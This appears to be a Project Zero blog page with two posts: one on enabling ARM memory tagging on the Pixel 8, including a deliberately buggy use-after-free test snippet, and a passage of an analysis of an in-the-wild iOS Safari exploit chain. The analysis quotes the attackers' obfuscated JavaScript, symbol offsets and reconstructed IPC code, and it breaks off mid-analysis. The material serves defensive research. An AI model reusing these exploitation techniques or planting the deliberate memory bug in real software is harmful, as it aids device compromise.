Project Zero: 2023

Friday, November 3, 2023

First handset with MTE on the market

By Mark Brand, Google Project Zero

Introduction

It's finally time for me to fulfill a long-standing promise. Since I first heard about ARM's Memory Tagging Extensions, I've said (to far too many people at this point to be able to back out…) that I'd immediately switch to the first available device that supported this feature. It's been a long wait (since late 2017) but with the release of the new Pixel 8 / Pixel 8 Pro handsets, there's finally a production handset that allows you to enable MTE!

The ability of MTE to detect memory corruption exploitation at the first dangerous access is a significant improvement in diagnostic and potential security effectiveness. The availability of MTE on a production handset for the first time is a big step forward, and I think there's real potential to use this technology to make 0-day harder.

I've been running my Pixel 8 with MTE enabled since release day, and so far I haven't found any issues with any of the applications I use on a daily basis1, or any noticeable performance issues.

Currently, MTE is only available on the Pixel as a developer option, intended for app developers to test their apps using MTE, but we can configure it to default to synchronous mode for all2 apps and native user mode binaries. This can be done on a stock image, without bootloader unlocking or rooting required - just a couple of debugger commands. We'll do that now, but first:

Disclaimer

This is absolutely not a supported device configuration; and it's highly likely that you'll encounter issues with at least some applications crashing or failing to run correctly with MTE if you set your device up in this way.

This is how I've configured my personal Pixel 8, and so far I've not experienced any issues, but this was somewhat of a surprise to me, and I'm still waiting to see what the first app that simply won't work at all will be...

Enabling MTE on Pixel 8/Pixel 8 Pro

Enabling MTE on an Android device requires the bootloader to reserve a portion of the device memory for storing tags. This means that there are two separate places where MTE needs to be enabled - first we need to configure the bootloader to enable it, and then we need to configure the system to use it in applications.

First we need follow the Android instructions to enable developer mode and USB debugging on the device:

Now we need to connect our phone to a trusted computer that has the Android debugging tools installed on it - I'm using my linux workstation:

markbrand@markbrand$ adb devices -l

List of devices attached

XXXXXXXXXXXXXX device usb:3-3 product:shiba model:Pixel_8 device:shiba transport_id:5

markbrand@markbrand$ adb shell

shiba:/ $ setprop arm64.memtag.bootctl memtag

shiba:/ $ setprop persist.arm64.memtag.default sync

shiba:/ $ setprop persist.arm64.memtag.app_default sync

shiba:/ $ reboot

These commands are doing a couple of things - first, we're configuring the bootloader to enable MTE at boot. The second command sets the default MTE mode for native executables running on the device, and the third command sets the default MTE mode for apps. An app developer can enable MTE by using the manifest, but this system property sets the default MTE mode for apps, effectively making it opt-out instead of opt-in.

While on the topic of apps opting-out, it's worth noting that Chrome doesn't use the system allocator for most allocations, and instead uses PartitionAlloc. There is experimental MTE support under development, which can be enabled with some additional steps3. Unfortunately this currently requires setting a command-line flag which involves some security tradeoffs. We expect that Chrome will add an easier way to enable MTE support without these problems in the near future.

If we look at all of the system properties, we can see that there are a few additional properties that are related to memory tagging:

shiba:/ $ getprop | grep memtag

[arm64.memtag.bootctl]: [memtag]

[persist.arm64.memtag.app.com.android.nfc]: [off]

[persist.arm64.memtag.app.com.android.se]: [off]

[persist.arm64.memtag.app.com.google.android.bluetooth]: [off]

[persist.arm64.memtag.app_default]: [sync]

[persist.arm64.memtag.default]: [sync]

[persist.arm64.memtag.system_server]: [off]

[ro.arm64.memtag.bootctl_supported]: [1]

There are unfortunately some default exclusions which we can't overwrite - the protections on system properties mean that we can't currently enable MTE for a few components in a normal production build - these exceptions are system_server and applications related to nfc, the secure element and bluetooth.

We wanted to make sure that these commands work, so we'll do that now. We'll first check whether it's working for native executables:

shiba:/ $ cat /proc/self/smaps | grep mt

VmFlags: rd wr mr mw me ac mt

765bff1000-765c011000 r--s 00000000 00:12 97 /dev/__properties__/u:object_r:arm64_memtag_prop:s0

We can see that our cat process has mappings with the mt bit set, so MTE has been enabled for the process.

Now in order to check that an app without any manifest setting has picked up this, we added a little bit of code to an empty JNI project to trigger a use-after-free bug:

extern "C" JNIEXPORT jstring JNICALL

Java_com_example_mtetestapplication_MainActivity_stringFromJNI(

JNIEnv* env,

jobject /* this */) {

char* ptr = strdup("test string");

free(ptr);

// Use-after-free when ptr is accessed below.

return env->NewStringUTF(ptr);

}

Without MTE, it's unlikely that the application would crash running this code. I also made sure that the application manifest does not set MTE, so it will inherit the default. When we launch the application we will see whether it crashes, and whether the crash is caused by an MTE check failure!

Looking at the logcat output we can see that the cause of the crash was a synchronous MTE tag check failure (SEGV_MTESERR).

DEBUG : *** *** *** *** *** *** *** *** *** *** *** *** *** *** *** ***

DEBUG : Build fingerprint: 'google/shiba/shiba:14/UD1A.230803.041/10808477:user/release-keys'

DEBUG : Revision: 'MP1.0'

DEBUG : ABI: 'arm64'

DEBUG : Timestamp: 2023-10-24 16:56:32.092532886+0200

DEBUG : Process uptime: 2s

DEBUG : Cmdline: com.example.mtetestapplication

DEBUG : pid: 24147, tid: 24147, name: testapplication >>> com.example.mtetestapplication <<<

DEBUG : uid: 10292

DEBUG : tagged_addr_ctrl: 000000000007fff3 (PR_TAGGED_ADDR_ENABLE, PR_MTE_TCF_SYNC, mask 0xfffe)

DEBUG : pac_enabled_keys: 000000000000000f (PR_PAC_APIAKEY, PR_PAC_APIBKEY, PR_PAC_APDAKEY, PR_PAC_APDBKEY)

DEBUG : signal 11 (SIGSEGV), code 9 (SEGV_MTESERR), fault addr 0x0b000072afa9f790

DEBUG : x0 0000000000000001 x1 0000007fe384c2e0 x2 0000000000000075 x3 00000072aae969ac

DEBUG : x4 0000007fe384c308 x5 0000000000000004 x6 7274732074736574 x7 00676e6972747320

DEBUG : x8 0000000000000020 x9 00000072ab1867e0 x10 000000000000050c x11 00000072aaed0af4

DEBUG : x12 00000072aaed0ca8 x13 31106e3dee7fb177 x14 ffffffffffffffff x15 00000000ebad6a89

DEBUG : x16 0000000000000001 x17 000000722ff047b8 x18 00000075740fe000 x19 0000007fe384c2d0

DEBUG : x20 0000007fe384c308 x21 00000072aae969ac x22 0000007fe384c2e0 x23 070000741fa897b0

DEBUG : x24 0b000072afa9f790 x25 00000072aaed0c18 x26 0000000000000001 x27 000000754a5fae40

DEBUG : x28 0000007573c00000 x29 0000007fe384c260

DEBUG : lr 00000072ab35e7ac sp 0000007fe384be30 pc 00000072ab1867ec pst 0000000080001000

DEBUG : 98 total frames

DEBUG : backtrace:

DEBUG : #00 pc 00000000003867ec /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::ScopedCheck::Check(art::ScopedObjectAccess&, bool, char const*, art::(anonymous namespace)::JniValueType*) (.__uniq.99033978352804627313491551960229047428)+1636) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG : #01 pc 000000000055e7a8 /apex/com.android.art/lib64/libart.so (art::(anonymous namespace)::CheckJNI::NewStringUTF(_JNIEnv*, char const*) (.__uniq.99033978352804627313491551960229047428.llvm.6178811259984417487)+160) (BuildId: a5fcf27f4a71b07dff05c648ad58e3cd)

DEBUG : #02 pc 00000000000017dc /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (_JNIEnv::NewStringUTF(char const*)+36) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

...

DEBUG : Note: multiple potential causes for this crash were detected, listing them in decreasing order of likelihood.

DEBUG : Cause: [MTE]: Use After Free, 0 bytes into a 12-byte allocation at 0x72afa9f790

DEBUG : deallocated by thread 24147:

DEBUG : #00 pc 000000000005e800 /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::quarantineOrDeallocateChunk(scudo::Options, void*, scudo::Chunk::UnpackedHeader*, unsigned long)+496) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG : #01 pc 0000000000057ba4 /apex/com.android.runtime/lib64/bionic/libc.so (scudo::Allocator<scudo::AndroidConfig, &(scudo_malloc_postinit)>::deallocate(void*, scudo::Chunk::Origin, unsigned long, unsigned long)+212) (BuildId: a017f07431ff6692304a0cae225962fb)

DEBUG : #02 pc 000000000000179c /data/app/~~lgGoAt3gB6oojf3IWXi-KQ==/com.example.mtetestapplication-k4Yl4oMx9PEbfuvTEkjqFg==/base.apk!libmtetestapplication.so (offset 0x1000) (Java_com_example_mtetestapplication_MainActivity_stringFromJNI+40) (BuildId: f60a9970a8a46ff7949a5c8e41d0ece51e47d82c)

If you just want to check that MTE has been enabled in the bootloader, there's an application on the Play Store from Google's Dynamic Tools team, which you can also use (this app enables MTE in async mode in the manifest, which is why you see below that it's not running in sync mode on all cores):

At this point, we can go back into the developer settings and disable USB debugging, since we don't want that enabled for normal day-to-day usage. We do need to leave the developer mode toggle on, since disabling that will turn off MTE again entirely on the next reboot.

Conclusion

The Pixel 8 with synchronous-MTE enabled is at least subjectively a performance and battery-life upgrade over my previous phone.

I think this is a huge improvement for the general security of the device - many zero-click attack surfaces involve large amounts of unsafe C/C++ code, whether that's WebRTC for calling, or one of the many media or image file parsing libraries. MTE is not a silver bullet for memory safety - but the release of the first production device with the ability to run almost all user-mode applications with synchronous-MTE is a huge step forward, and something that's worth celebrating!

1 On a team member's device, a single MTE detection of a use-after-free bug happened last week. This resulted in a crash that wasn't noticed at the time, but which we later found when looking through the saved crash reports on their device. Because the alloc and free stacktraces of the allocation were recorded, we were able to quickly figure out the bug and report it to the application developers - the bug in this case was caused by user gesture input, and doesn't really have security impact, but it already illustrates some of the advantages of MTE.

2 Except for se (secure element), bluetooth, nfc, and the system server, due to these system apps explicitly setting their individual system properties to 'off' in the Pixel system image.

3 Enabling MTE in Chrome requires setting multiple command line flags, which on a non-rooted Android device requires configuring Chrome to load the command line flags from a file in /data/local/tmp. This is potentially unsafe, so we'd not suggest doing this, but if you'd like to experiment on a test device or for fuzzing, the following commands will allow you to run Chrome with MTE enabled:

markbrand@markbrand:~$ adb shell

shiba:/ $ umask 022
shiba:/ $ echo "_ --enable-features=PartitionAllocMemoryTagging:enabled-processes/all-processes/memtag-mode/sync --disable-features=PartitionAllocPermissiveMte,KillPartitionAllocMemoryTagging" > /data/local/tmp/chrome-command-line
shiba:/ $ ls -la /data/local/tmp/chrome-command-line

-rw-r--r-- 1 shell shell 176 2023-10-25 19:14 /data/local/tmp/chrome-command-line

Having run these commands, we need to configure Chrome to read the command line file; this can be done by opening Chrome, browsing to chrome://flags#enable-command-line-on-non-rooted-devices, and setting the highlighted flag to "Enabled".

Note that unfortunately this only applies to webpages viewed using the Chrome app, and not to other Chromium-based browsers or non-browser apps that use the Chromium based Android WebView to implement their rendering.

Friday, October 13, 2023

An analysis of an in-the-wild iOS Safari WebContent to GPU Process exploit

By Ian Beer

A graph representation of the sandbox escape NSExpression payload

In April this year Google's Threat Analysis Group, in collaboration with Amnesty International, discovered an in-the-wild iPhone zero-day exploit chain being used in targeted attacks delivered via malicious link. The chain was reported to Apple under a 7-day disclosure deadline and Apple released iOS 16.4.1 on April 7, 2023 fixing CVE-2023-28206 and CVE-2023-28205.

Over the last few years Apple has been hardening the Safari WebContent (or "renderer") process sandbox attack surface on iOS, recently removing the ability for the WebContent process to access GPU-related hardware directly. Access to graphics-related drivers is now brokered via a GPU process which runs in a separate sandbox.

Analysis of this in-the-wild exploit chain reveals the first known case of attackers exploiting the Safari IPC layer to "hop" from WebContent to the GPU process, adding an extra link to the exploit chain (CVE-2023-32409).

On the surface this is a positive sign: clear evidence that the renderer sandbox was hardened sufficiently that (in this isolated case at least) the attackers needed to bundle an additional, separate exploit. Project Zero has long advocated for attack-surface reduction as an effective tool for improving security and this would seem like a clear win for that approach.

On the other hand, upon deeper inspection, things aren't quite so rosy. Retroactively sandboxing code which was never designed with compartmentalization in mind is rarely simple to do effectively. In this case the exploit targeted a very basic buffer overflow vulnerability in unused IPC support code for a disabled feature - effectively new attack surface which exists only because of the introduced sandbox. A simple fuzzer targeting the IPC layer would likely have found this vulnerability in seconds.

Nevertheless, it remains the case that attackers will still need to exploit this extra link in the chain each time to reach the GPU driver kernel attack surface. A large part of this writeup is dedicated to analysis of the NSExpression-based framework the attackers developed to ease this and vastly reduce their marginal costs.

Setting the stage

After gaining native code execution exploiting a JavaScriptCore Garbage Collection vulnerability the attackers perform a find-and-replace on a large ArrayBuffer in JavaScript containing a Mach-O binary to link a number of platform- and version-dependent symbol addresses and structure offsets using hardcoded values:

// find and rebase symbols for current target and ASLR slide:

dt: {

ce: false,

["16.3.0"]: {

_e: 0x1ddc50ed1,

de: 0x1dd2d05b8,

ue: 0x19afa9760,

he: 1392,

me: 48,

fe: 136,

pe: 0x1dd448e70,

ge: 305,

Ce: 0x1dd2da340,

Pe: 0x1dd2da348,

ye: 0x1dd2d45f0,

be: 0x1da613438,

...

["16.3.1"]: {

_e: 0x1ddc50ed1,

de: 0x1dd2d05b8,

ue: 0x19afa9760,

he: 1392,

me: 48,

fe: 136,

pe: 0x1dd448e70,

ge: 305,

Ce: 0x1dd2da340,

Pe: 0x1dd2da348,

ye: 0x1dd2d45f0,

be: 0x1da613438,

// mach-o Uint32Array:

xxxx = new Uint32Array([0x77a9d075,0x88442ab6,0x9442ab8,0x89442ab8,0x89442aab,0x89442fa2,

// deobfuscate xxx

...

// find-and-replace symbols:

xxxx.on(new m("0x2222222222222222"), p.Le);

xxxx.on(new m("0x3333333333333333"), Gs);

xxxx.on(new m("0x9999999999999999"), Bs);

xxxx.on(new m("0x8888888888888888"), Rs);

xxxx.on(new m("0xaaaaaaaaaaaaaaaa"), Is);

xxxx.on(new m("0xc1c1c1c1c1c1c1c1"), vt);

xxxx.on(new m("0xdddddddddddddddd"), p.Xt);

xxxx.on(new m("0xd1d1d1d1d1d1d1d1"), p.Jt);

xxxx.on(new m("0xd2d2d2d2d2d2d2d2"), p.Ht);

The initial Mach-O which this loads has a fairly small __TEXT (code) segment and is itself in fact a Mach-O loader, which loads another binary from a segment called __embd. It's this inner Mach-O which this analysis will cover.

Part I - Mysterious Messages

Looking through the strings in the binary there's a collection of familiar IOKit userclient matching strings referencing graphics drivers:

"AppleM2ScalerCSCDriver",0

"IOSurfaceRoot",0

"AGXAccelerator",0

But following the cross references to "AGXAccelerator" (which opens userclients for the GPU) this string never gets passed to IOServiceOpen. Instead, all references to it end up here (the binary is stripped so all function names are my own):

kern_return_t

get_a_user_client(char *matching_string,

u32 type,

void* s_out) {

kern_return_t ret;

struct uc_reply_msg;

mach_port_name_t reply_port;

struct msg_1 msg;

reply_port = 0;

mach_port_allocate(mach_task_self_,

MACH_PORT_RIGHT_RECEIVE,

&reply_port);

memset(&msg, 0, sizeof(msg));

msg.hdr.msgh_bits = 0x1413;

msg.hdr.msgh_remote_port = a_global_port;

msg.hdr.msgh_local_port = reply_port;

msg.hdr.msgh_id = 5;

msg.hdr.msgh_size = 200;

msg.field_a = 0;

msg.type = type;

__strcpy_chk(msg.matching_str, matching_string, 128LL);

ret = mach_msg_send(&msg.hdr);

...

// return a port read from the reply message via s_out

Whilst it's not unusual for a userclient matching string to end up inside a mach message (plenty of exploits will include or generate their own MIG serialization code for interacting with IOKit) this isn't a MIG message.

Trying to track down the origin of the port right to which this message was sent was non-trivial; there was clearly more going on. My guess was that this must be communicating with something else, likely some other part of the exploit. The question was: what other part?

Down the rabbit hole

At this point I started going through all the cross-references to the imported symbols which could send or receive mach messages, hoping to find the other end of this IPC. This just raised more questions than it answered.

In particular, there were a lot of cross-references to a function sending a variable-sized mach message with a msgh_id of 0xDBA1DBA.

There is exactly one hit on Google for that constant:

Ignoring Google's helpful advice that maybe I wanted to search for "cake recipes" instead of this hex constant and following the single result leads to this snippet on opensource.apple.com in ConnectionCocoa.mm:

namespace IPC {

static const size_t inlineMessageMaxSize = 4096;

// Arbitrary message IDs that do not collide with Mach notification messages (used my initials).

constexpr mach_msg_id_t inlineBodyMessageID = 0xdba0dba;

constexpr mach_msg_id_t outOfLineBodyMessageID = 0xdba1dba;

This is a constant used in Safari IPC messages!

Whilst Safari has had a separate networking process for a long time it's only recently started to isolate GPU and graphics-related functionality into a GPU process. Knowing this, it's fairly clear what must be going on here: since the renderer process can presumably no longer open the AGXAccelerator userclients, the exploit is somehow going to have to get the GPU process to do that. This is likely the first case of an in-the-wild iOS exploit targeting Safari's IPC layer.

The path less trodden

Googling for info on Safari IPC doesn't yield many results (apart from some very early Project Zero vulnerability reports) and looking through the WebKit source reveals heavy use of generated code and C++ operator overloading, neither of which are conducive to quickly getting a feel for the binary-level structure of the IPC messages.

But the high-level structure is easy enough to figure out. As we can see from the code snippet above, IPC messages containing the msgh_id value 0xdba1dba send their serialized message body as an out-of-line descriptor. That serialized body always starts with a common header defined in the IPC namespace as:

void Encoder::encodeHeader()

{

*this << defaultMessageFlags;

*this << m_messageName;

*this << m_destinationID;

}

The flags and name fields are both 16-bit values and destinationID is 64 bits. The serialization uses natural alignment so there's 4 bytes of padding between the name and destinationID:

It's easy enough to enumerate all the functions in the exploit which serialize these Safari IPC messages. None of them hardcode the messageName values; instead there's a layer of indirection indicating that the messageName values aren't stable across builds. The exploit uses the device's uname string, product and OS version to choose the correct hardcoded table of messageName values.

The IPC::description function in the iOS shared cache maps messageName values to IPC names:

const char * IPC::description(unsigned int messageName)

{

if ( messageName > 0xC78 )

return "<invalid message name>";

else

return off_1D61ED988[messageName];

}

The size of the bounds check gives you an idea of the size of the IPC attack surface - that's over 3000 IPC messages between all pairs of communicating processes.

Using the table in the shared cache to map the message names to human-readable strings we can see the exploit uses the following 24 IPC messages:

0x39: GPUConnectionToWebProcess_CreateRemoteGPU

0x3a: GPUConnectionToWebProcess_CreateRenderingBackend

0x9B5: InitializeConnection

0x9B7: ProcessOutOfStreamMessage

0xBA2: RemoteAdapter_RequestDevice

0xBA5: RemoteBuffer_MapAsync

0x271: RemoteBuffer_Unmap

0xBA6: RemoteCDMFactoryProxy_CreateCDM

0x2A2: RemoteDevice_CreateBuffer

0x2C7: RemoteDisplayListRecorder_DrawNativeImage

0x2D4: RemoteDisplayListRecorder_FillRect

0x2DF: RemoteDisplayListRecorder_SetCTM

0x2F3: RemoteGPUProxy_WasCreated

0xBAD: RemoteGPU_RequestAdapter

0x402: RemoteMediaRecorderManager_CreateRecorder

0xA85: RemoteMediaRecorderManager_CreateRecorderReply

0x412: RemoteMediaResourceManager_RedirectReceived

0x469: RemoteRenderingBackendProxy_DidInitialize

0x46D: RemoteRenderingBackend_CacheNativeImage

0x46E: RemoteRenderingBackend_CreateImageBuffer

0x474: RemoteRenderingBackend_ReleaseResource

0x9B8: SetStreamDestinationID

0x9B9: SyncMessageReply

0x9BA: Terminate

This list of IPC names solidifies the theory that this exploit is targeting a GPU process vulnerability.

Finding a way

The destination port which these messages are being sent to comes from a global variable which looks like this in the raw Mach-O when loaded into IDA:

__data:000000003E4841C0 dst_port DCQ 0x4444444444444444

I mentioned earlier that the outer JS which loaded the exploit binary first performed a find-and-replace using patterns like this. Here's the snippet computing this particular value:

let Ls = o(p.Ee);

let Ds = o(Ls.add(p.qe));

let Ws = o(Ds.add(p.$e));

let vs = o(Ws.add(p.Ze));

jBHk.on(new m("0x4444444444444444"), vs);

Replacing all the constants we can see it's following a pointer chain from a hardcoded offset inside the shared cache:

let Ls = o(0x1dd453458);

let Ds = o(Ls.add(256));

let Ws = o(Ds.add(24);

let vs = o(Ws.add(280));

At the initial symbol address (0x1dd453458) we find the WebContent process's singleton process object which maintains its state:

WebKit:__common:00000001DD453458 WebKit::WebProcess::singleton(void)::process

Following the offsets we can see they follow this pointer chain to be able to find the mach port right representing the WebProcess's connection to the GPU process:

process->m_gpuProcessConnection->m_connection->m_sendPort

The exploit also reads the m_receivePort field allowing it to set up bidirectional communication with the GPU process and fully imitate the WebContent process.

Defining features

Webkit defines its IPC messages using a simple custom DSL in files ending with the suffix .messages.in. These definitions look like this:

messages -> RemoteRenderPipeline NotRefCounted Stream {

void GetBindGroupLayout(uint32_t index, WebKit::WebGPUIdentifier identifier);

void SetLabel(String label)

}

These are parsed by this python script to generate the necessary boilerplate code to handle serializing and deserializing the messages. Types which wish to cross the serialization boundary define ::encode and ::decode methods:

void encode(IPC::Encoder&) const;

static WARN_UNUSED_RETURN bool decode(IPC::Decoder&, T&);

There are a number of macros defining these coders for the built-in types.

A pattern appears

Renaming the methods in the exploit which send IPC messages and reversing some more of their arguments a clear pattern emerges:

image_buffer_base_id = rand();

for (i = 0; i < 34; i++) {

IPC_RemoteRenderingBackend_CreateImageBuffer(

image_buffer_base_id + i);

}

semaphore_signal(semaphore_b);

remote_device_buffer_id_base = rand();